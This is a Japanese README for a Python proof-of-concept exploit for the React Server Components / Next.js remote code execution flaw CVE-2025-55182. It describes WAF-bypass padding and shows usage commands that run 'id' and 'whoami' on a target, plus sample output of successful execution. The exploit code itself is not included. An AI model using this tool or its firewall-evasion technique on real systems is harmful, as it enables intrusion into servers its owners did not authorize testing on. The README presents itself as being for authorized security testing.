
CVE-2025-55182 (React2Shell) のPython PoC。Next.js/React Server ComponentsのRCEで、認可されたセキュリティテスト用の動的WAFバイパスパディング付き。
Next.js(App Router)や類似のフレームワークで使用される React Server Components における重大なリモートコード実行脆弱性である CVE-2025-55182(別名 React2Shell)向けの、クリーンで信頼性の高い Python 概念実証エクスプロイトです。
この PoC には、大きな multipart ボディの深い検査を制限する一般的な Web アプリケーションファイアウォール(Cloudflare、AWS WAF など)を回避するための 動的 WAF バイパスパディング が含まれています。
requests ライブラリpip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
このツールは、許可されたセキュリティテストおよび研究のみを目的としています。